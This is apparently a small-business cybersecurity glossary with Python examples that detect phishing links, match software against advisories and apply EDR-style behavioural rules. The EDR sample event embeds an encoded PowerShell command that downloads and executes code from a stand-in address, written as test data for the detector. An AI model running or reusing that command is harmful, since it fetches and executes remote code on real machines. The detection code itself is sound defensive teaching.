Cyber security incidents are becoming more frequent and more costly — and the trend isn't reversing. Criminals target businesses of all sizes, and Australian organisations in particular have been headline news repeatedly in recent years. Knowing the terminology isn't just useful for IT teams: business owners and managers who understand these concepts make better decisions about where to invest in protection and when to take a reported risk seriously.
This article covers the most important terms in plain language — what they mean, how they relate to each other, and why they matter to your business.
How attackers get in — attack vectors
An attack vector is any method an attacker can use to gain unauthorised access to a system. Think of it as a door into your business. Some are obvious, such as a login page protected by a weak password. Others are subtle, such as a member of staff acting on an email from someone pretending to be the CEO. Understanding the common attack vectors helps you prioritise where to focus your defences, because most real incidents start with one of a small number of doors.
Vulnerabilities and bugs
Software is written by humans, and humans make mistakes. These mistakes produce bugs — errors in how the software behaves. Most bugs are inconvenient but harmless. Some, however, create security weaknesses that can be exploited. These are called vulnerabilities.
Vulnerabilities are what security patches address. When a software vendor releases an update that fixes a security issue, they're closing off a known vulnerability before (or after) attackers can exploit it. This is why keeping software patched and updated is one of the most basic and impactful things a business can do for security.
Zero-days
A zero-day vulnerability is one the software vendor either doesn't yet know about or hasn't yet released a fix for. The name comes from the vendor having had zero days to develop a patch. These are particularly dangerous because no patch exists: keeping your software updated cannot protect you from a zero-day until the vendor has produced and shipped a fix. Until then, the controls that help are the ones that limit the damage, such as restricting what the affected software can reach and monitoring it for unusual behaviour.
Zero-days are sometimes discovered by security researchers who report them responsibly to vendors before disclosing them publicly. Sometimes they're discovered by malicious actors first, and exploited quietly before anyone else is aware. Zero-day exploits are typically sophisticated and expensive to develop — they tend to be used in targeted attacks against high-value targets rather than mass campaigns, though this isn't always the case.
Phishing
Phishing is an attack designed to trick people into handing over credentials, financial information, or access they shouldn't share. The most familiar form is email phishing — a message that looks like it came from a bank, a government agency, or a trusted supplier, with a link to a fake login page designed to capture your username and password.
Email phishing has evolved significantly. Modern campaigns use personalised information about the target (sometimes called spear phishing), making the messages far more convincing than the obvious scam emails of the past. Businesses are frequently targeted through fake invoice emails, fake supplier payment updates, or messages impersonating the business owner requesting urgent transfers; this family of attacks is often called business email compromise. A common tell is a link whose visible text shows a trusted address while the actual destination is somewhere else entirely.
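The link mismatch mentioned above is something you can check mechanically. The following is an added example, not code from the original article: it parses the HTML body of a constructed sample email and flags links where the text shown to the reader is itself a web address whose domain differs from the real destination, or where the destination uses a punycode (xn--) hostname of the kind used for lookalike domains. The supplier domains and addresses in the sample are invented for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the HTML body of a fake "overdue invoice" email.
# The domains are invented for this example and do not belong to anyone.
SAMPLE_EMAIL_HTML = """
<p>Your invoice is overdue. Log in to review it:</p>
<a href="https://accounts.example-supplier.com/login">https://accounts.example-supplier.com/login</a>
<a href="http://example-supplier.com.payments-update.example/login">https://accounts.example-supplier.com/login</a>
<a href="https://xn--exmple-supplier-8nb.com/login">Click here to update payment details</a>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:  # only collect text that sits inside an <a>
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    """Lowercased hostname of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def _registrable(host):
    """Crude 'last two labels' approximation of the registrable domain.
    Sufficient for the demonstration; production code would consult a public-suffix list."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def suspicious_links(html):
    """Return a list of (href, reason) for links that show common phishing tells:
    - the destination hostname contains a punycode (xn--) label
    - the visible text is itself a URL whose domain differs from the real destination
    """
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        dest = _host(href)
        if any(label.startswith("xn--") for label in dest.split(".")):
            findings.append((href, "punycode hostname"))
        shown = _host(text) if text.startswith(("http://", "https://")) else ""
        if shown and _registrable(shown) != _registrable(dest):
            findings.append((href, f"text shows {shown} but link goes to {dest}"))
    return findings


if __name__ == "__main__":
    for href, reason in suspicious_links(SAMPLE_EMAIL_HTML):
        print(f"SUSPICIOUS: {href} ({reason})")
```

Run against the sample, the first link passes (text and destination agree) and the other two are flagged. Hovering over a link to compare the displayed address with the real one is the manual version of the same check, and it is worth teaching staff to do it before clicking.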
Social engineering
Social engineering is the broader category that phishing falls into. Where phishing uses fake messages, social engineering includes any attack that manipulates people through deception rather than exploiting technical vulnerabilities.
Impersonation is a common form — someone calling your accounts team pretending to be a supplier and requesting a bank account change for future payments. Another form is pretexting — building a convincing false scenario over time to gain the trust needed to obtain access or information. The common thread is that these attacks target people rather than systems, which means technical security controls alone can't stop them.
What happens once attackers are in — malicious payloads
Getting past the door is only the first step. Once inside, an attacker needs something to do the damage — this is the malicious payload.
Malware
Malware is the umbrella term for any software designed to cause harm. Viruses, ransomware, spyware, trojans — these are all types of malware. The word simply means "malicious software." When people talk about protecting against malware, they're talking about protecting against this entire category.
Ransomware
Ransomware deserves specific mention because it is currently among the most common and financially damaging forms of attack on Australian businesses. Once it gains a foothold on one device, the attackers (or the malware itself) spread it across as many connected systems as they can reach, then encrypt files so the business can no longer access them. The attacker then demands payment in exchange for the decryption key.
Even businesses that pay don't always get their data back. And the cost goes beyond the ransom itself: downtime, recovery, reputational damage, regulatory notifications. Ransomware incidents have shut down Australian businesses for days or weeks at a time. Tested backups that are kept offline or otherwise isolated from the main network are the single most effective recovery measure: if your files are encrypted, you restore from a clean copy rather than negotiating with criminals. Backups do nothing, however, about data the attackers copied out before encrypting it (see exfiltration below).
Exfiltration
Data exfiltration refers to the unauthorised extraction of data from a business — copying sensitive information out to a location controlled by the attacker. This can happen alongside ransomware (modern ransomware operators frequently steal data before encrypting it, giving them double leverage) or independently through a quieter intrusion.
Exfiltration is one of the main reasons Australian data breach notification obligations come into play. Under the Notifiable Data Breaches scheme in the Privacy Act 1988, a business covered by the Act that experiences unauthorised access to, disclosure of, or loss of personal information likely to result in serious harm must notify the Office of the Australian Information Commissioner (OAIC) and the affected individuals. The scheme applies to most businesses with annual turnover above $3 million and to some smaller ones, such as health service providers. The maximum penalties for serious or repeated interferences with privacy were increased substantially in 2022.
DDoS attacks
A Distributed Denial of Service (DDoS) attack doesn't aim to steal data — it aims to take a service offline. The attacker floods a target's network or servers with traffic from many sources simultaneously, overwhelming its capacity to respond to legitimate requests. The result is a service that's slow or completely inaccessible to your customers.
DDoS attacks are sometimes used as extortion — pay up or the attack continues — and sometimes simply to cause disruption. Businesses that depend on their website or online services being available are most exposed.
How to defend against it
Firewalls and web application firewalls (WAFs)
A firewall is a security control that sits between a trusted network (your office) and an untrusted one (the internet), deciding which traffic is allowed to pass in each direction based on configured rules. Modern firewalls go well beyond simple port filtering — they can inspect traffic, identify and block known threats, and enforce policies about what can and can't be accessed.
A Web Application Firewall (WAF) operates at the application layer rather than the network layer. Where a regular firewall looks at where traffic is coming from and where it's going, a WAF looks at the content of that traffic in the context of the application it's targeting. WAFs are used to protect web-facing applications from attacks like SQL injection and cross-site scripting — attack types that look legitimate to a standard firewall but are malicious at the application level.
Penetration testing and vulnerability scanning
Penetration testing (often shortened to pen testing) involves authorised security professionals attempting to break into your systems using the same methods a real attacker would. The goal is to find weaknesses before the attackers do. A pen test produces a detailed report of what was found and how it should be addressed.
Pen testing is thorough but resource-intensive, so it's typically done periodically rather than continuously. Vulnerability scanning provides a more automated, ongoing complement: software tools check your systems on a schedule (or continuously) against databases of known vulnerabilities, comparing installed software versions and configuration settings with the versions and settings known to be affected, and flag anything that needs attention. Scanners are good at catching missing patches at scale; pen testers find the logic and configuration flaws that no database lists. The two approaches complement each other rather than compete.
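The core of the version-matching step that both the patching section and the vulnerability scanning section describe is simple enough to show directly. The following is an added example, not code from the original article or from any real scanner: a constructed advisory feed (the ADV-000x identifiers and product names are placeholders, not real advisories) is matched against a constructed software inventory. It also shows the pitfall of comparing version numbers as text, which would cause a scanner to miss a vulnerable version such as 2.4.9 when the fix is in 2.4.50.

```python
from dataclasses import dataclass


def parse_version(text):
    """Turn '2.4.49' into (2, 4, 49) so versions compare numerically rather than as
    strings. As strings, '2.4.9' sorts after '2.4.50' and would look patched."""
    return tuple(int(part) for part in text.split("."))


@dataclass(frozen=True)
class Advisory:
    """A constructed advisory record: the product it affects, the first fixed version,
    and a label. The labels are placeholders, not real advisory or CVE identifiers."""
    product: str
    fixed_in: str
    label: str


# Constructed advisory feed and software inventory for the demonstration only.
ADVISORIES = [
    Advisory("webserver", "2.4.50", "ADV-0001"),
    Advisory("webserver", "2.4.52", "ADV-0002"),
    Advisory("mailgateway", "7.2.0", "ADV-0003"),
]

INVENTORY = {
    "host-a": {"webserver": "2.4.49", "mailgateway": "7.2.3"},
    "host-b": {"webserver": "2.4.51"},
    "host-c": {"webserver": "2.4.9"},
}


def scan_inventory(inventory, advisories):
    """Return {host: [advisory labels]} for every installed version that is older than
    the version in which the advisory says the issue was fixed."""
    findings = {}
    for host, software in inventory.items():
        hits = [
            adv.label
            for adv in advisories
            if adv.product in software
            and parse_version(software[adv.product]) < parse_version(adv.fixed_in)
        ]
        if hits:
            findings[host] = hits
    return findings


if __name__ == "__main__":
    for host, labels in scan_inventory(INVENTORY, ADVISORIES).items():
        print(f"{host}: missing fixes for {', '.join(labels)}")
```

Installing the vendor's update moves a host's version past the fixed_in value and the finding disappears, which is the whole relationship between patches and vulnerabilities described earlier on this page. Real scanners also handle vendor-specific version schemes, backported fixes and configuration checks, none of which this sketch attempts.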
EDR — Endpoint Detection and Response
Traditional antivirus software works by comparing files and processes against a database of known malicious signatures. If a piece of malware doesn't match a known signature, it's not flagged. This approach has significant limitations against modern attacks, which increasingly use novel techniques to evade signature-based detection.
EDR (Endpoint Detection and Response) takes a different approach. Rather than looking only for known bad signatures, EDR monitors the behaviour of software running on devices, flagging activity that looks suspicious even if the software itself isn't in any database: for example, a word processor launching a scripting tool, or a script silently downloading and running code from the internet. This makes it considerably more effective against zero-days, novel malware, and "living off the land" attacks that use legitimate, built-in system tools for malicious purposes. The "response" half matters too: EDR records what happened on the device, so responders can see how an intrusion unfolded, and it lets them isolate an affected machine from the network before the problem spreads.
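The behavioural rules described above can be illustrated with a few lines of detection logic. The following is an added example, not code from the original article or from any EDR product: it runs a small set of rules over constructed process-creation events of the kind an endpoint agent records (the field names, file names and the 203.0.113.5 address are invented for the demonstration). Every program involved is a legitimate, signed Windows component, so a signature-only antivirus has nothing to match; the attack is visible only in how the programs are being used together.

```python
import base64

# Constructed sample process-creation events, modelled loosely on what an endpoint
# agent records. The field layout is illustrative, not any vendor's real telemetry.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')".encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe C:\\Users\\jo\\Invoice_4471.docm"},
    {"parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED_PAYLOAD},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload of a PowerShell command line, or None.
    PowerShell expects this switch's argument to be base64 of UTF-16LE text."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if tok.lower() in ("-encodedcommand", "-enc", "-ec", "-e") and i + 1 < len(tokens):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def evaluate(event):
    """Apply behavioural rules to one process-creation event; return the alerts raised."""
    alerts = []
    image, parent = event["image"].lower(), event["parent"].lower()
    cmd = event["cmdline"].lower()

    # Rule 1: an Office document spawning a script interpreter is the classic macro chain.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append(f"{parent} spawned {image} (macro-style execution chain)")

    # Rules 2-4: PowerShell started hidden, with an encoded command, that fetches remote code.
    if image in ("powershell.exe", "pwsh.exe"):
        if "-w hidden" in cmd or "-windowstyle hidden" in cmd:
            alerts.append("powershell started with a hidden window")
        decoded = decode_encoded_command(event["cmdline"])
        if decoded is not None:
            alerts.append(f"encoded command decodes to: {decoded}")
            if "downloadstring" in decoded.lower() or "iex" in decoded.lower():
                alerts.append("decoded command downloads and executes remote content")
    return alerts


def scan(events):
    """Run every event through the rules; return {event index: alerts} for those that fired."""
    findings = {}
    for index, event in enumerate(events):
        alerts = evaluate(event)
        if alerts:
            findings[index] = alerts
    return findings


if __name__ == "__main__":
    for index, alerts in scan(SAMPLE_EVENTS).items():
        print(f"event {index}:")
        for alert in alerts:
            print(f"  ALERT: {alert}")
```

Only the second event fires, on all four rules; the administrator's scheduled backup script in the third event runs PowerShell too but trips none of them, which is the kind of distinction behavioural detection has to make to avoid drowning a small team in false alarms.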
Cyber security can feel overwhelming, particularly for businesses without dedicated IT staff. But the fundamentals — patched software, strong credentials with multi-factor authentication, tested backups, staff awareness, and a firewall configured by someone who knows what they're doing — address the majority of real-world risk. Talk to our team if you'd like help assessing where your business currently stands.